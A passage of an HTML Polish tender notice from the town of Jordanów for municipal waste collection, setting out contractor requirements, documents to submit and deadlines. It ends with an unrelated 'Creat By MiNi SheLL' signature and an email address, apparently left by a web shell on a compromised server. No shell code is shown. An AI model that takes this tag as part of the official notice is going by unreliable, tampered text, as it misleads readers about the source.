Wykazana usługa musi być poparta dokumentami potwierdzającymi, że usługa ta została wykonana należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienia wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający wymaga oświadczenia wykonawcy, iż posiada bazę magazynowo-transportową oraz o odpowiednim stanie technicznym  wyposażenie umożliwiające odbieranie odpadów komunalnych od właścicieli nieruchomości - zgodnie ROZPORZĄDZENIEM MINISTRA ŚRODOWISKA z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. z dnia 25 stycznia 2013 r. nr 0 poz. 122 ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeśli wykonawca wykaże że, posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności, zgodnej z przedmiotem niniejszego zamówienia, co najmniej na kwotę 500 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty wymagane w przypadku składania oferty wspólnej:
1) wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia, w takim przypadku dla ustanowionego pełnomocnika do oferty należy załączyć pełnomocnictwo do reprezentowania w postępowaniu lub do reprezentowania w postępowaniu i zawarcia umowy, 2) oferta winna zawierać: oświadczenia i dokumenty opisane w Rozdziale VI pkt 2 dla każdego partnera z osobna. 
3) Jeżeli oferta wykonawców, o których mowa w pkt 1, zostanie wybrana, zamawiający żąda przed zawarciem umowy w sprawie zamówienia publicznego przedłożenia umowy regulującej współpracę tych wykonawców.

Dokumenty wymagane w przypadku korzystania z potencjału innych podmiotów:
1) wykonawca zobowiązany jest, zgodnie z art. 26 pkt 2b ustawy Prawo zamówień publicznych, udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie podmiotów do oddania wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.jordanow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Jordanowa, 34-240 Jordanów, Rynek 1, pok. nr 11.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.11.2013 godzina 09:30, miejsce: Urząd Miasta Jordanowa, 34-240 Jordanów, Rynek 1, pok. nr 6 -sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com